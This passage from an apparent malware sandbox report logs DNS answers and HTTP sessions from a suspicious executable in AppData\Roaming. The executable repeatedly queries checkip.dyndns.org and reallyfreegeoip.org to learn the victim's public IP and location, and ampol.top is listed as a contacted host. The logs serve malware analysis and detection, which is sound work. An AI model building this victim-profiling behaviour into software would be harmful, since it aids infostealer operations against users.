Jul 1, 2024 20:06:13.605909109 CEST | 8.8.8.8 | 192.168.2.22 | 0xae9 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.605909109 CEST | 8.8.8.8 | 192.168.2.22 | 0xae9 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.839656115 CEST | 8.8.8.8 | 192.168.2.22 | 0xc115 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:13.839656115 CEST | 8.8.8.8 | 192.168.2.22 | 0xc115 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.839656115 CEST | 8.8.8.8 | 192.168.2.22 | 0xc115 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.839656115 CEST | 8.8.8.8 | 192.168.2.22 | 0xc115 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.839656115 CEST | 8.8.8.8 | 192.168.2.22 | 0xc115 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:13.839656115 CEST | 8.8.8.8 | 192.168.2.22 | 0xc115 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:15.534264088 CEST | 8.8.8.8 | 192.168.2.22 | 0x31c9 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:15.534264088 CEST | 8.8.8.8 | 192.168.2.22 | 0x31c9 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.151537895 CEST | 8.8.8.8 | 192.168.2.22 | 0x23ee | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:17.151537895 CEST | 8.8.8.8 | 192.168.2.22 | 0x23ee | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.151537895 CEST | 8.8.8.8 | 192.168.2.22 | 0x23ee | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.151537895 CEST | 8.8.8.8 | 192.168.2.22 | 0x23ee | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.151537895 CEST | 8.8.8.8 | 192.168.2.22 | 0x23ee | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.151537895 CEST | 8.8.8.8 | 192.168.2.22 | 0x23ee | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.241972923 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:17.241972923 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.241972923 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.241972923 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.241972923 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.241972923 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.259255886 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:17.259255886 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.259255886 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.259255886 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.259255886 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.259255886 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf79 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.984749079 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ff8 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:17.984749079 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ff8 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.675920010 CEST | 8.8.8.8 | 192.168.2.22 | 0x87ad | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:18.675920010 CEST | 8.8.8.8 | 192.168.2.22 | 0x87ad | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.675920010 CEST | 8.8.8.8 | 192.168.2.22 | 0x87ad | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.675920010 CEST | 8.8.8.8 | 192.168.2.22 | 0x87ad | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.675920010 CEST | 8.8.8.8 | 192.168.2.22 | 0x87ad | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.675920010 CEST | 8.8.8.8 | 192.168.2.22 | 0x87ad | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.684806108 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:18.684806108 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.684806108 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.684806108 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.684806108 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.684806108 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.691688061 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 1, 2024 20:06:18.691688061 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.691688061 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 1, 2024 20:06:18.691688061 CEST | 8.8.8.8 | 192.168.2.22 | 0xcdda | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:18.691688061 CEST8.8.8.8192.168.2.220xcddaNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.187002897 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.187002897 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.199649096 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.199649096 CEST8.8.8.8192.168.2.220x3812No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.843449116 CEST8.8.8.8192.168.2.220xbae3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:19.852303028 CEST8.8.8.8192.168.2.220x8a3bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:21.494229078 CEST8.8.8.8192.168.2.220x1b9eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:21.494229078 CEST8.8.8.8192.168.2.220x1b9eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.132004976 CEST8.8.8.8192.168.2.220xa772No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.141232967 CEST8.8.8.8192.168.2.220x9f6fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.756479979 CEST8.8.8.8192.168.2.220xaf1fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:22.756479979 CEST8.8.8.8192.168.2.220xaf1fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.451953888 CEST8.8.8.8192.168.2.220x9e69No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.461724043 CEST8.8.8.8192.168.2.220x2e18No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.990027905 CEST8.8.8.8192.168.2.220x4f9eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:23.990027905 CEST8.8.8.8192.168.2.220x4f9eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.661016941 CEST8.8.8.8192.168.2.220x41d8No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:24.670028925 CEST8.8.8.8192.168.2.220xb21aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:25.179678917 CEST8.8.8.8192.168.2.220x7a55No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 1, 2024 20:06:25.179678917 CEST8.8.8.8192.168.2.220x7a55No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    • ampol.top
                    • reallyfreegeoip.org
                    • checkip.dyndns.org
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.22 | 49164 | 158.101.44.242 | 80 | 3244 | C:\Users\user\AppData\Roaming\obie8920193.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 1, 2024 20:06:13.880681992 CEST | 151 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:14.596788883 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:14 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: bfafaf2268caa8f0ef2bab45bef729c5
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:14.681226969 CEST | 127 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 1, 2024 20:06:14.855660915 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:14 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: cd79b36b59ca5af32b4109d71c045e25
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:15.079313993 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:14 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: cd79b36b59ca5af32b4109d71c045e25
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:16.297147036 CEST | 127 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 1, 2024 20:06:16.461544037 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:16 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 71e504bd071e8c3200864705fa3e0c1d
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.22 | 49167 | 193.122.6.168 | 80 | 3244 | C:\Users\user\AppData\Roaming\obie8920193.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 1, 2024 20:06:17.267494917 CEST | 127 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 1, 2024 20:06:17.935688019 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:17 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a123f54bf969e7297934ce1f64f208ad
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 1, 2024 20:06:18.147530079 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:17 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a123f54bf969e7297934ce1f64f208ad
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.22 | 49169 | 193.122.130.0 | 80 | 3244 | C:\Users\user\AppData\Roaming\obie8920193.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 1, 2024 20:06:18.697963953 CEST | 127 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 1, 2024 20:06:19.171230078 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:19 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: ff86fa62ee8c897842301122a24b821d
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.22 | 49171 | 158.101.44.242 | 80 | 3244 | C:\Users\user\AppData\Roaming\obie8920193.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 1, 2024 20:06:19.857837915 CEST | 151 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 1, 2024 20:06:21.475548983 CEST | 320 | IN | HTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:21 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 31e38d09acda3244b70dd117d827841f
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.22 | 49173 | 158.101.44.242 | 80 | 3244 | C:\Users\user\AppData\Roaming\obie8920193.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 1, 2024 20:06:22.146749020 CEST | 151 | OUT | GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
